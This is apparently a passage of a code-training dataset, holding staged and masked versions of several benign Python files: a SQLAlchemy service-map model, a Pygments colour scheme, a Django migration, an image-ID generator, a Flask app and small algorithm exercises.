ServiceMap.\n host_environment_id == coalesce(PSLI.host_environment_id,\n dbstage.personality.host_environment.id)))\n if dbnetwork:\n q = q.filter(or_(ServiceMap.location_id.in_(location_ids), \n ServiceMap.network_id == dbnetwork.id))\n else:\n q = q.filter(ServiceMap.location_id.in_(location_ids))\n q = q.options(contains_eager('service_instance'), defer(\n 'service_instance.comments'), undefer(\n 'service_instance._client_count'), lazyload(\n 'service_instance.service'))\n instance_cache = {}\n instance_priority = defaultdict(lambda : (maxsize,))\n for map in q:\n si = map.service_instance\n service = si.service\n if instance_priority[service] > map.priority:\n instance_cache[service] = [si]\n instance_priority[service] = map.priority\n elif instance_priority[service] == map.priority:\n instance_cache[service].append(si)\n return instance_cache\n", "step-5": "# -*- cpy-indent-level: 4; indent-tabs-mode: nil -*-\n# ex: set expandtab softtabstop=4 shiftwidth=4:\n#\n# Copyright (C) 2008,2009,2010,2011,2012,2013,2014,2015,2016 Contributor\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\" Maps service instances to locations. See class.__doc__ \"\"\"\n\nfrom collections import defaultdict\nfrom datetime import datetime\nfrom sys import maxsize\n\nfrom sqlalchemy import (Column, Integer, Sequence, DateTime, ForeignKey,\n UniqueConstraint, CheckConstraint)\nfrom sqlalchemy.orm import (relation, deferred, backref, defer, undefer,\n lazyload, contains_eager, object_session)\nfrom sqlalchemy.sql import and_, or_, null, case\nfrom sqlalchemy.sql.functions import coalesce\n\nfrom aquilon.exceptions_ import InternalError, AquilonError\nfrom aquilon.aqdb.model import (Base, Location, Desk, Rack, Room, Bunker,\n Building, City, Campus, Country, Continent, Hub,\n Organization, ServiceInstance, Network, Personality,\n PersonalityServiceListItem, HostEnvironment)\n\n_TN = 'service_map'\n\n# TODO: We could calculate this map by building a graph of Location subclasses\n# using Location.valid_parents as edges, and then doing a topological sort\n# NOTE: The actual values here are unimportant, what matters is their order\n_LOCATION_PRIORITY = {\n # Rack and Desk are at the same level\n Rack: 1000,\n Desk: 1000,\n Room: 1100,\n Bunker: 1200,\n Building: 1300,\n City: 1400,\n Campus: 1500,\n Country: 1600,\n Continent: 1700,\n Hub: 1800,\n Organization: 1900,\n}\n\n# NOTE: The actual value here is unimportant, what matters is the order wrt.\n# location-based priorities\n_NETWORK_PRIORITY = 100\n\n# NOTE: The actual values here are unimportant, only their order matters\n_TARGET_PERSONALITY = 10\n_TARGET_ENVIRONMENT = 100\n_TARGET_GLOBAL = 1000\n\n\nclass ServiceMap(Base):\n \"\"\" Service Map: mapping a service_instance to a location.\n The rows in this table assert that an instance is a valid useable\n default that clients can choose as their provider during service\n autoconfiguration.\n\n The contained information is actually a triplet:\n - The service instance to use,\n - Rules for the scope where the map is valid,\n - Rules for which objects does the map apply.\n \"\"\"\n\n __tablename__ = _TN\n\n id = Column(Integer, Sequence('%s_id_seq' % _TN), primary_key=True)\n\n service_instance_id = Column(ForeignKey(ServiceInstance.id,\n ondelete='CASCADE'),\n nullable=False)\n\n personality_id = Column(ForeignKey(Personality.id, ondelete='CASCADE'),\n nullable=True, index=True)\n\n host_environment_id = Column(ForeignKey(HostEnvironment.id), nullable=True)\n\n location_id = Column(ForeignKey(Location.id, ondelete='CASCADE'),\n nullable=True, index=True)\n\n network_id = Column(ForeignKey(Network.id, ondelete='CASCADE'),\n nullable=True, index=True)\n\n creation_date = deferred(Column(DateTime, default=datetime.now,\n nullable=False))\n\n service_instance = relation(ServiceInstance, innerjoin=True,\n backref=backref('service_map',\n cascade=\"all, delete-orphan\",\n passive_deletes=True))\n personality = relation(Personality)\n host_environment = relation(HostEnvironment)\n location = relation(Location)\n network = relation(Network)\n\n __table_args__ = (UniqueConstraint(service_instance_id,\n personality_id, host_environment_id,\n location_id, network_id,\n name='%s_uk' % _TN),\n # At most one of personality_id and host_environment_id\n # can be not NULL\n CheckConstraint(case([(personality_id != null(), 1)], else_=0) +\n case([(host_environment_id != null(), 1)], else_=0) <= 1,\n name='%s_target_ck' % _TN))\n\n @property\n def service(self):\n return self.service_instance.service\n\n @property\n def scope_priority(self):\n if self.network:\n return _NETWORK_PRIORITY\n else:\n try:\n return _LOCATION_PRIORITY[type(self.location)]\n except KeyError: # pragma: no cover\n raise InternalError(\"The service map is not prepared to handle \"\n \"location class %r\" % type(self.location))\n\n @property\n def object_priority(self):\n if self.personality:\n return _TARGET_PERSONALITY\n elif self.host_environment:\n return _TARGET_ENVIRONMENT\n else:\n return _TARGET_GLOBAL\n\n @property\n def priority(self):\n return (self.object_priority, self.scope_priority)\n\n @property\n def scope(self):\n if self.location:\n return self.location\n else:\n return self.network\n\n def __init__(self, service_instance, network=None, location=None, personality=None,\n host_environment=None):\n if network and location: # pragma: no cover\n raise AquilonError(\"A service can't be mapped to a Network and a \"\n \"Location at the same time\")\n\n if network is None and location is None: # pragma: no cover\n raise AquilonError(\"A service should by mapped to a Network or a \"\n \"Location\")\n\n if personality and host_environment: # pragma: no cover\n raise AquilonError(\"A service can't be mapped to a Personality and \"\n \"a HostEnvironment at the same time\")\n\n super(ServiceMap, self).__init__(service_instance=service_instance,\n network=network, location=location,\n personality=personality,\n host_environment=host_environment)\n\n @staticmethod\n def get_location_mapped_instances(dbservice, dblocation):\n # Simplified service map lookup - single service, location-based maps\n # only, no client bindings\n session = object_session(dbservice)\n\n location_ids = [loc.id for loc in dblocation.parents]\n location_ids.append(dblocation.id)\n\n q = session.query(ServiceMap)\n q = q.filter(and_(ServiceMap.personality_id == null(),\n ServiceMap.host_environment_id == null()))\n q = q.filter(ServiceMap.location_id.in_(location_ids))\n q = q.join(ServiceInstance)\n q = q.filter_by(service=dbservice)\n q = q.options(contains_eager('service_instance'),\n defer('service_instance.comments'),\n lazyload('service_instance.service'))\n\n instances = []\n min_seen_priority = (maxsize,)\n\n # We want the instance(s) with the lowest priority\n for map in q:\n si = map.service_instance\n\n if min_seen_priority > map.priority:\n instances = [si]\n min_seen_priority = map.priority\n elif min_seen_priority == map.priority:\n instances.append(si)\n\n return instances\n\n @staticmethod\n def get_mapped_instance_cache(dbservices, dbstage, dblocation,\n dbnetwork=None):\n \"\"\"Returns dict of requested services to closest mapped instances.\"\"\"\n\n session = object_session(dblocation)\n\n location_ids = [loc.id for loc in dblocation.parents]\n location_ids.append(dblocation.id)\n\n PSLI = PersonalityServiceListItem\n\n q = session.query(ServiceMap)\n q = q.join(ServiceInstance)\n q = q.filter(ServiceInstance.service_id.in_(srv.id for srv in dbservices))\n\n q = q.outerjoin(PSLI, and_(PSLI.personality_stage_id == dbstage.id,\n PSLI.service_id == ServiceInstance.service_id))\n\n # Rules for filtering by target object\n q = q.filter(or_(\n and_(ServiceMap.personality_id == null(),\n ServiceMap.host_environment_id == null()),\n ServiceMap.personality == dbstage.personality,\n ServiceMap.host_environment_id == coalesce(\n PSLI.host_environment_id,\n dbstage.personality.host_environment.id)))\n\n # Rules for filtering by location/scope\n if dbnetwork:\n q = q.filter(or_(ServiceMap.location_id.in_(location_ids),\n ServiceMap.network_id == dbnetwork.id))\n else:\n q = q.filter(ServiceMap.location_id.in_(location_ids))\n\n q = q.options(contains_eager('service_instance'),\n defer('service_instance.comments'),\n undefer('service_instance._client_count'),\n lazyload('service_instance.service'))\n\n instance_cache = {}\n instance_priority = defaultdict(lambda: (maxsize,))\n\n # For every service, we want the instance(s) with the lowest priority\n for map in q:\n si = map.service_instance\n service = si.service\n\n if instance_priority[service] > map.priority:\n instance_cache[service] = [si]\n instance_priority[service] = map.priority\n elif instance_priority[service] == map.priority:\n instance_cache[service].append(si)\n\n return instance_cache\n", "step-ids": [ 9, 10, 11, 13, 14 ] }
[ 9, 10, 11, 13, 14 ]
from numba import jit @jit def resolve(): N = int(input()) ans = 0 for n in range(1, N+1): for m in range(n, N+1, n): ans += m print(ans) if __name__ == "__main__": resolve()
normal
{ "blob_id": "8d8df517ca5486e62cc1b5ac23bbcfa65ed9c1ff", "index": 6611, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\n@jit\ndef resolve():\n N = int(input())\n ans = 0\n for n in range(1, N + 1):\n for m in range(n, N + 1, n):\n ans += m\n print(ans)\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\n@jit\ndef resolve():\n N = int(input())\n ans = 0\n for n in range(1, N + 1):\n for m in range(n, N + 1, n):\n ans += m\n print(ans)\n\n\nif __name__ == '__main__':\n resolve()\n", "step-4": "from numba import jit\n\n\n@jit\ndef resolve():\n N = int(input())\n ans = 0\n for n in range(1, N + 1):\n for m in range(n, N + 1, n):\n ans += m\n print(ans)\n\n\nif __name__ == '__main__':\n resolve()\n", "step-5": "from numba import jit\n\n@jit\ndef resolve():\n N = int(input())\n\n ans = 0\n for n in range(1, N+1):\n for m in range(n, N+1, n):\n ans += m\n print(ans)\n\nif __name__ == \"__main__\":\n resolve()", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
# -*- coding: utf-8 -*- """ Neverland2 Colorscheme ~~~~~~~~~~~~~~~~~~~~~~ Converted by Vim Colorscheme Converter """ from pygments.style import Style from pygments.token import Token, Keyword, Comment, Number, Generic, Operator, Name, String class Neverland2Style(Style): background_color = '#121212' styles = { Token: '#ffffff', Name.Function: '#ff005f', Operator.Word: '#00ff00', Name.Label: 'noinherit #ffffaf', Generic.Subheading: '#0000ff', Generic.Traceback: '#ff00af bg:#121212 bold', Generic.Error: '#ffafff bg:#121212', Comment: '#87875f', Name.Attribute: '#ff005f', Name.Constant: '#af5fff bold', Number.Float: '#af5fff', Generic.Inserted: 'bg:#121212', Keyword.Type: 'noinherit #5fd7ff', String: '#d7af5f', Generic.Deleted: '#d70087 bg:#080808', Comment.Preproc: '#ffafd7', Keyword: '#ffff87 bold', Name.Exception: '#87ff00 bold', Name.Variable: '#d75f00', Generic.Heading: '#0000ff', Name.Tag: '#ffff87 bold', Number: '#0087ff', Generic.Output: '#121212 bg:#121212', Name.Entity: '#5fd7ff bg:#080808', Generic.Emph: '#808080 underline', }
normal
{ "blob_id": "9dccc19abb6dac9e9606dc1fd83a227b4da9bf1f", "index": 4047, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\nclass Neverland2Style(Style):\n <mask token>\n <mask token>\n", "step-3": "<mask token>\n\n\nclass Neverland2Style(Style):\n background_color = '#121212'\n styles = {Token: '#ffffff', Name.Function: '#ff005f', Operator.Word:\n '#00ff00', Name.Label: 'noinherit #ffffaf', Generic.Subheading:\n '#0000ff', Generic.Traceback: '#ff00af bg:#121212 bold', Generic.\n Error: '#ffafff bg:#121212', Comment: '#87875f', Name.Attribute:\n '#ff005f', Name.Constant: '#af5fff bold', Number.Float: '#af5fff',\n Generic.Inserted: 'bg:#121212', Keyword.Type: 'noinherit #5fd7ff',\n String: '#d7af5f', Generic.Deleted: '#d70087 bg:#080808', Comment.\n Preproc: '#ffafd7', Keyword: '#ffff87 bold', Name.Exception:\n '#87ff00 bold', Name.Variable: '#d75f00', Generic.Heading:\n '#0000ff', Name.Tag: '#ffff87 bold', Number: '#0087ff', Generic.\n Output: '#121212 bg:#121212', Name.Entity: '#5fd7ff bg:#080808',\n Generic.Emph: '#808080 underline'}\n", "step-4": "<mask token>\nfrom pygments.style import Style\nfrom pygments.token import Token, Keyword, Comment, Number, Generic, Operator, Name, String\n\n\nclass Neverland2Style(Style):\n background_color = '#121212'\n styles = {Token: '#ffffff', Name.Function: '#ff005f', Operator.Word:\n '#00ff00', Name.Label: 'noinherit #ffffaf', Generic.Subheading:\n '#0000ff', Generic.Traceback: '#ff00af bg:#121212 bold', Generic.\n Error: '#ffafff bg:#121212', Comment: '#87875f', Name.Attribute:\n '#ff005f', Name.Constant: '#af5fff bold', Number.Float: '#af5fff',\n Generic.Inserted: 'bg:#121212', Keyword.Type: 'noinherit #5fd7ff',\n String: '#d7af5f', Generic.Deleted: '#d70087 bg:#080808', Comment.\n Preproc: '#ffafd7', Keyword: '#ffff87 bold', Name.Exception:\n '#87ff00 bold', Name.Variable: '#d75f00', Generic.Heading:\n '#0000ff', Name.Tag: '#ffff87 bold', Number: '#0087ff', Generic.\n Output: '#121212 bg:#121212', Name.Entity: '#5fd7ff bg:#080808',\n Generic.Emph: '#808080 underline'}\n", "step-5": "# -*- coding: utf-8 -*-\n\"\"\"\n Neverland2 Colorscheme\n ~~~~~~~~~~~~~~~~~~~~~~\n\n Converted by Vim Colorscheme Converter\n\"\"\"\nfrom pygments.style import Style\nfrom pygments.token import Token, Keyword, Comment, Number, Generic, Operator, Name, String\n\nclass Neverland2Style(Style):\n\n background_color = '#121212'\n styles = {\n Token: '#ffffff',\n Name.Function: '#ff005f',\n Operator.Word: '#00ff00',\n Name.Label: 'noinherit #ffffaf',\n Generic.Subheading: '#0000ff',\n Generic.Traceback: '#ff00af bg:#121212 bold',\n Generic.Error: '#ffafff bg:#121212',\n Comment: '#87875f',\n Name.Attribute: '#ff005f',\n Name.Constant: '#af5fff bold',\n Number.Float: '#af5fff',\n Generic.Inserted: 'bg:#121212',\n Keyword.Type: 'noinherit #5fd7ff',\n String: '#d7af5f',\n Generic.Deleted: '#d70087 bg:#080808',\n Comment.Preproc: '#ffafd7',\n Keyword: '#ffff87 bold',\n Name.Exception: '#87ff00 bold',\n Name.Variable: '#d75f00',\n Generic.Heading: '#0000ff',\n Name.Tag: '#ffff87 bold',\n Number: '#0087ff',\n Generic.Output: '#121212 bg:#121212',\n Name.Entity: '#5fd7ff bg:#080808',\n Generic.Emph: '#808080 underline',\n }\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
# Generated by Django 2.0 on 2018-03-06 16:21 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('digressions', '0004_auto_20180303_1158'), ] operations = [ migrations.RemoveField( model_name='extraits', name='extraits_livre_id', ), migrations.AddField( model_name='extraits', name='extraits_livre_id', field=models.ForeignKey(default='du coté de chez Swann', on_delete=django.db.models.deletion.CASCADE, to='digressions.Livre'), preserve_default=False, ), ]
normal
{ "blob_id": "38c21fb959d8b98b616006ea48bd720cc6f9995c", "index": 1462, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n", "step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('digressions', '0004_auto_20180303_1158')]\n operations = [migrations.RemoveField(model_name='extraits', name=\n 'extraits_livre_id'), migrations.AddField(model_name='extraits',\n name='extraits_livre_id', field=models.ForeignKey(default=\n 'du coté de chez Swann', on_delete=django.db.models.deletion.\n CASCADE, to='digressions.Livre'), preserve_default=False)]\n", "step-4": "from django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n dependencies = [('digressions', '0004_auto_20180303_1158')]\n operations = [migrations.RemoveField(model_name='extraits', name=\n 'extraits_livre_id'), migrations.AddField(model_name='extraits',\n name='extraits_livre_id', field=models.ForeignKey(default=\n 'du coté de chez Swann', on_delete=django.db.models.deletion.\n CASCADE, to='digressions.Livre'), preserve_default=False)]\n", "step-5": "# Generated by Django 2.0 on 2018-03-06 16:21\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('digressions', '0004_auto_20180303_1158'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='extraits',\n name='extraits_livre_id',\n ),\n migrations.AddField(\n model_name='extraits',\n name='extraits_livre_id',\n field=models.ForeignKey(default='du coté de chez Swann', on_delete=django.db.models.deletion.CASCADE, to='digressions.Livre'),\n preserve_default=False,\n ),\n ]\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
#======================================================================= __version__ = '''0.0.01''' __sub_version__ = '''20130714221105''' __copyright__ = '''(c) Alex A. Naanou 2011''' #----------------------------------------------------------------------- import os import sha import md5 import base64 import time import pyexiv2 as metadata #----------------------------------------------------------------------- # XXX need a strategy to check if two files that have the same GID are # identical, and if so, need to destinguish them in the GID... # might be a good idea to add a file hash # XXX not yet sure if this is unique enough to avoid conflicts if one # photographer has enough cameras... # XXX also might be wise to add a photographer ID into here... ##!!! add gid info section to identify the options used to greate a gid, e.g. EXIF date vs. ctime, etc. ##!!! do a general revision and remove leacy... def image_gid(path, date=None, format='%(artist)s-%(date)s-%(name)s', date_format='%Y%m%d-%H%M%S', default_artist='Unknown', use_ctime=False, hash_func=lambda s: sha.sha(s).hexdigest()): ''' Calculate image GID. Main gid criteria: - unique - calculable from the item (preferably any sub-item) - human-readable Default format: <artist>-<datetime>-<filename> Example: Alex_A.Naanou-20110627-195706-DSC_1234 If hash_func is not None, then the function will be used to generate a hex hash from the above string. Supported fields: %(artist)s - Exif.Image.Artist field, stripped and spaces replaced with underscores. If no artist info is set this will be set to default_artist. %(date)s - Exif.Photo.DateTimeOriginal formated to date_format argument. %(name)s - file name. NOTE: date and time are the date and time the image was made ('Exif.Image.DateTime') NOTE: need EXIF data to generate a GID ''' # get the filename... data = { 'name': os.path.splitext(os.path.split(path)[-1])[0], } ##!!! this might fail... i = metadata.ImageMetadata('%s' % path) try: i.read() except IOError: # can't read exif... i = None # check if we need a date in the id... if '%(date)s' in format: if date is not None: data['date'] = time.strftime(date_format, time.gmtime(date)) elif use_ctime or i is None: date = os.path.getctime(path) data['date'] = time.strftime(date_format, time.gmtime(date)) else: date = i['Exif.Photo.DateTimeOriginal'].value data['date'] = date.strftime(date_format) # check if we need an artist... if '%(artist)s' in format: data['artist'] = default_artist if i is not None: try: # set the artist if in EXIF... a = i['Exif.Image.Artist'].value.strip().replace(' ', '_') if a != '': data['artist'] = a except KeyError: pass if hash_func is not None: return hash_func(format % data) return format % data #--------------------------------------------------handle_commandline--- def handle_commandline(): from optparse import OptionParser parser = OptionParser() ##!!! need to define the path so that it shoes up in -h parser.add_option('-t', '--text', dest='format', action='store_const', const='text', default='sha', help='output GUID in base64 format.') parser.add_option('-b', '--base64', dest='format', action='store_const', const='base64', default='sha', help='output GUID in text format.') parser.add_option('-s', '--sha', dest='format', action='store_const', const='sha', default='sha', help='output GUID in sha format.') options, args = parser.parse_args() if len(args) != 1: parser.print_usage() else: IN_PATH = args[0] IN_PATH = IN_PATH.replace('\\', '/') if options.format == 'text': print image_gid(IN_PATH, hash_func=None) elif options.format == 'base64': # also remove the trailing \n... print image_gid(IN_PATH, hash_func=lambda s: base64.encodestring(s).strip()) else: print image_gid(IN_PATH) #----------------------------------------------------------------------- if __name__ == '__main__': handle_commandline() #======================================================================= # vim:set ts=4 sw=4 nowrap :
normal
{ "blob_id": "d03f87b7dfa8fe2c63500effda1bea5e41f17ffc", "index": 3787, "step-1": "#=======================================================================\r\n\r\n__version__ = '''0.0.01'''\r\n__sub_version__ = '''20130714221105'''\r\n__copyright__ = '''(c) Alex A. Naanou 2011'''\r\n\r\n\r\n#-----------------------------------------------------------------------\r\n\r\nimport os\r\nimport sha\r\nimport md5\r\nimport base64\r\nimport time\r\n\r\nimport pyexiv2 as metadata\r\n\r\n\r\n#-----------------------------------------------------------------------\r\n\r\n# XXX need a strategy to check if two files that have the same GID are\r\n# \t identical, and if so, need to destinguish them in the GID...\r\n# \t might be a good idea to add a file hash\r\n# XXX not yet sure if this is unique enough to avoid conflicts if one\r\n# \t photographer has enough cameras...\r\n# XXX also might be wise to add a photographer ID into here...\r\n##!!! add gid info section to identify the options used to greate a gid, e.g. EXIF date vs. ctime, etc.\r\n##!!! do a general revision and remove leacy...\r\ndef image_gid(path, date=None, \r\n\t\tformat='%(artist)s-%(date)s-%(name)s', \r\n\t\tdate_format='%Y%m%d-%H%M%S', \r\n\t\tdefault_artist='Unknown',\r\n\t\tuse_ctime=False,\r\n\t\thash_func=lambda s: sha.sha(s).hexdigest()):\r\n\t'''\r\n\tCalculate image GID.\r\n\r\n\tMain gid criteria:\r\n\t \t- unique\r\n\t \t- calculable from the item (preferably any sub-item)\r\n\t \t- human-readable\r\n\r\n\tDefault format:\r\n\t\t<artist>-<datetime>-<filename>\r\n\r\n\tExample:\r\n\t\tAlex_A.Naanou-20110627-195706-DSC_1234\t\r\n\r\n\tIf hash_func is not None, then the function will be used to generate \r\n\ta hex hash from the above string.\r\n\r\n\tSupported fields:\r\n\t\t%(artist)s\t- Exif.Image.Artist field, stripped and spaces replaced\r\n\t\t\t\t\t with underscores.\r\n\t\t\t\t\t If no artist info is set this will be set to default_artist.\r\n\t\t%(date)s\t- Exif.Photo.DateTimeOriginal formated to date_format argument.\r\n\t\t%(name)s\t- file name.\r\n\r\n\tNOTE: date and time are the date and time the image was made ('Exif.Image.DateTime')\r\n\tNOTE: need EXIF data to generate a GID\r\n\t'''\r\n\t# get the filename...\r\n\tdata = {\r\n\t\t'name': os.path.splitext(os.path.split(path)[-1])[0],\r\n\t}\r\n\t##!!! this might fail...\r\n\ti = metadata.ImageMetadata('%s' % path)\r\n\ttry:\r\n\t\ti.read()\r\n\texcept IOError:\r\n\t\t# can't read exif...\r\n\t\ti = None\r\n\t# check if we need a date in the id...\r\n\tif '%(date)s' in format:\r\n\t\tif date is not None:\r\n\t\t\tdata['date'] = time.strftime(date_format, time.gmtime(date))\r\n\t\telif use_ctime or i is None:\r\n\t\t\tdate = os.path.getctime(path)\r\n\t\t\tdata['date'] = time.strftime(date_format, time.gmtime(date))\r\n\t\telse:\r\n\t\t\tdate = i['Exif.Photo.DateTimeOriginal'].value\r\n\t\t\tdata['date'] = date.strftime(date_format)\r\n\t# check if we need an artist...\r\n\tif '%(artist)s' in format:\r\n\t\tdata['artist'] = default_artist\r\n\t\tif i is not None:\r\n\t\t\ttry:\r\n\t\t\t\t# set the artist if in EXIF...\r\n\t\t\t\ta = i['Exif.Image.Artist'].value.strip().replace(' ', '_')\r\n\t\t\t\tif a != '':\r\n\t\t\t\t\tdata['artist'] = a\r\n\t\t\texcept KeyError:\r\n\t\t\t\tpass\r\n\t\r\n\tif hash_func is not None:\r\n\t\treturn hash_func(format % data)\r\n\treturn format % data\r\n\r\n\r\n\r\n#--------------------------------------------------handle_commandline---\r\ndef handle_commandline():\r\n\tfrom optparse import OptionParser\r\n\r\n\tparser = OptionParser()\r\n\r\n\t##!!! need to define the path so that it shoes up in -h\r\n\r\n\tparser.add_option('-t', '--text',\r\n\t\t\t\t\t\tdest='format',\r\n\t\t\t\t\t\taction='store_const',\r\n\t\t\t\t\t\tconst='text',\r\n\t\t\t\t\t\tdefault='sha',\r\n\t\t\t\t\t\thelp='output GUID in base64 format.')\r\n\tparser.add_option('-b', '--base64',\r\n\t\t\t\t\t\tdest='format',\r\n\t\t\t\t\t\taction='store_const',\r\n\t\t\t\t\t\tconst='base64',\r\n\t\t\t\t\t\tdefault='sha',\r\n\t\t\t\t\t\thelp='output GUID in text format.')\r\n\tparser.add_option('-s', '--sha',\r\n\t\t\t\t\t\tdest='format',\r\n\t\t\t\t\t\taction='store_const',\r\n\t\t\t\t\t\tconst='sha',\r\n\t\t\t\t\t\tdefault='sha',\r\n\t\t\t\t\t\thelp='output GUID in sha format.')\r\n\r\n\toptions, args = parser.parse_args()\r\n\r\n\tif len(args) != 1:\r\n\t\tparser.print_usage()\r\n\telse:\r\n\t\tIN_PATH = args[0]\r\n\t\tIN_PATH = IN_PATH.replace('\\\\', '/')\r\n\r\n\t\tif options.format == 'text':\r\n\t\t\tprint image_gid(IN_PATH, hash_func=None)\r\n\t\telif options.format == 'base64':\r\n\t\t\t# also remove the trailing \\n...\r\n\t\t\tprint image_gid(IN_PATH, hash_func=lambda s: base64.encodestring(s).strip())\r\n\t\telse:\r\n\t\t\tprint image_gid(IN_PATH)\r\n\r\n\r\n#-----------------------------------------------------------------------\r\nif __name__ == '__main__':\r\n\thandle_commandline()\r\n\r\n\r\n\r\n#=======================================================================\r\n# vim:set ts=4 sw=4 nowrap :\r\n", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
from distributions.zero_inflated_poisson import ZeroInflatedPoisson from distributions.negative_binomial import NegativeBinomial from distributions.zero_inflated_negative_binomial import ZeroInflatedNegativeBinomial from distributions.zero_inflated import ZeroInflated from distributions.categorized import Categorized from distributions.pareto import Pareto
normal
{ "blob_id": "dfae1007adc557a15d03b78f2bf790fb5b06141a", "index": 4442, "step-1": "<mask token>\n", "step-2": "from distributions.zero_inflated_poisson import ZeroInflatedPoisson\nfrom distributions.negative_binomial import NegativeBinomial\nfrom distributions.zero_inflated_negative_binomial import ZeroInflatedNegativeBinomial\nfrom distributions.zero_inflated import ZeroInflated\nfrom distributions.categorized import Categorized\nfrom distributions.pareto import Pareto\n", "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0, 1 ] }
[ 0, 1 ]
# 나의 풀이 def solution(prices): # 초 단위로 기록된 주식가격이 담긴 배열 prices # 가격이 떨어지지 않은 기간을 리턴 answer = [0]*len(prices) for i in range(len(prices)-1): for j in range(i+1, len(prices)): answer[i] += 1 # 가격이 떨어졌을 경우 if prices[i] > prices[j]: break return answer
normal
{ "blob_id": "23b6d754adf1616bc6ea1f8c74984fbd8dade6dd", "index": 4238, "step-1": "<mask token>\n", "step-2": "def solution(prices):\n answer = [0] * len(prices)\n for i in range(len(prices) - 1):\n for j in range(i + 1, len(prices)):\n answer[i] += 1\n if prices[i] > prices[j]:\n break\n return answer\n", "step-3": "# 나의 풀이\ndef solution(prices):\n # 초 단위로 기록된 주식가격이 담긴 배열 prices # 가격이 떨어지지 않은 기간을 리턴\n answer = [0]*len(prices)\n \n for i in range(len(prices)-1):\n for j in range(i+1, len(prices)):\n answer[i] += 1\n # 가격이 떨어졌을 경우\n if prices[i] > prices[j]:\n break\n\n return answer\n", "step-4": null, "step-5": null, "step-ids": [ 0, 1, 2 ] }
[ 0, 1, 2 ]
from setup import app, manager from Users.controller import user_controller from Test.controller import test_controller app.register_blueprint(test_controller, url_prefix="/test") #registeting test_controller blueprint with the main "app" and asking it to handle all url that begins with "/test". For eg: http://127.0.0.1/test/anythingcanbehere/orhere/orhere all such urls will go the test_conrtoller file. For now we just have to defined endpoints "test_get", "test_post". Anything else will result in 404 not fond error. app.register_blueprint(user_controller, url_prefix="/") if __name__ == "__main__": app.run(debug=True) #manager.run()
normal
{ "blob_id": "afa22db946f77e9b33a443657592c20fbea21eb1", "index": 6146, "step-1": "<mask token>\n", "step-2": "<mask token>\napp.register_blueprint(test_controller, url_prefix='/test')\napp.register_blueprint(user_controller, url_prefix='/')\nif __name__ == '__main__':\n app.run(debug=True)\n", "step-3": "from setup import app, manager\nfrom Users.controller import user_controller\nfrom Test.controller import test_controller\napp.register_blueprint(test_controller, url_prefix='/test')\napp.register_blueprint(user_controller, url_prefix='/')\nif __name__ == '__main__':\n app.run(debug=True)\n", "step-4": "from setup import app, manager\nfrom Users.controller import user_controller\nfrom Test.controller import test_controller\n\napp.register_blueprint(test_controller, url_prefix=\"/test\") #registeting test_controller blueprint with the main \"app\" and asking it to handle all url that begins with \"/test\". For eg: http://127.0.0.1/test/anythingcanbehere/orhere/orhere all such urls will go the test_conrtoller file. For now we just have to defined endpoints \"test_get\", \"test_post\". Anything else will result in 404 not fond error.\napp.register_blueprint(user_controller, url_prefix=\"/\")\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n #manager.run()", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
speed, lic_plate = input().split() salary = int(0) while lic_plate != "A999AA": if int(speed) > 60: if lic_plate[1] == lic_plate[2] and lic_plate [2] == lic_plate[3]: salary += 1000 elif lic_plate[1] == lic_plate[2] or lic_plate [1] == lic_plate[3]: salary += 500 elif lic_plate[2] == lic_plate[3]: salary += 500 else: salary += 100 speed, lic_plate = input().split() print(salary)
normal
{ "blob_id": "ff8ffeb418bf4f9bc7d5dadd126ebc7c34c5c2cd", "index": 4454, "step-1": "<mask token>\n", "step-2": "<mask token>\nwhile lic_plate != 'A999AA':\n if int(speed) > 60:\n if lic_plate[1] == lic_plate[2] and lic_plate[2] == lic_plate[3]:\n salary += 1000\n elif lic_plate[1] == lic_plate[2] or lic_plate[1] == lic_plate[3]:\n salary += 500\n elif lic_plate[2] == lic_plate[3]:\n salary += 500\n else:\n salary += 100\n speed, lic_plate = input().split()\nprint(salary)\n", "step-3": "speed, lic_plate = input().split()\nsalary = int(0)\nwhile lic_plate != 'A999AA':\n if int(speed) > 60:\n if lic_plate[1] == lic_plate[2] and lic_plate[2] == lic_plate[3]:\n salary += 1000\n elif lic_plate[1] == lic_plate[2] or lic_plate[1] == lic_plate[3]:\n salary += 500\n elif lic_plate[2] == lic_plate[3]:\n salary += 500\n else:\n salary += 100\n speed, lic_plate = input().split()\nprint(salary)\n", "step-4": "speed, lic_plate = input().split()\nsalary = int(0)\nwhile lic_plate != \"A999AA\":\n if int(speed) > 60:\n if lic_plate[1] == lic_plate[2] and lic_plate [2] == lic_plate[3]:\n salary += 1000\n elif lic_plate[1] == lic_plate[2] or lic_plate [1] == lic_plate[3]:\n salary += 500\n elif lic_plate[2] == lic_plate[3]:\n salary += 500\n else:\n salary += 100\n speed, lic_plate = input().split()\nprint(salary)\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
